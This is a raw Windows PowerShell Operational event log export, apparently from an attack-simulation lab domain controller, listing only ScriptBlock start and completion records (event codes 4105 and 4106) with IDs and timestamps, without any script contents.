SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478556
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478555
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478554
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478553
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478552
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478551
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478550
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478549
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478548
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478547
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478546
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478545
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478544
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478543
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478542
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478541
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478540
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478539
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478538
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478537
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478536
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478535
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478534
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478533
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478532
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478531
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478530
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478529
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478528
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478527
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478526
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478525
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478524
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478523
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478522
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478521
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478520
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478519
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478518
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478517
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478516
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478515
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478514
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478513
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478512
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478511
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478510
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478509
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478508
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478507
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478506
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478505
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478504
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478503
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478502
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478501
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
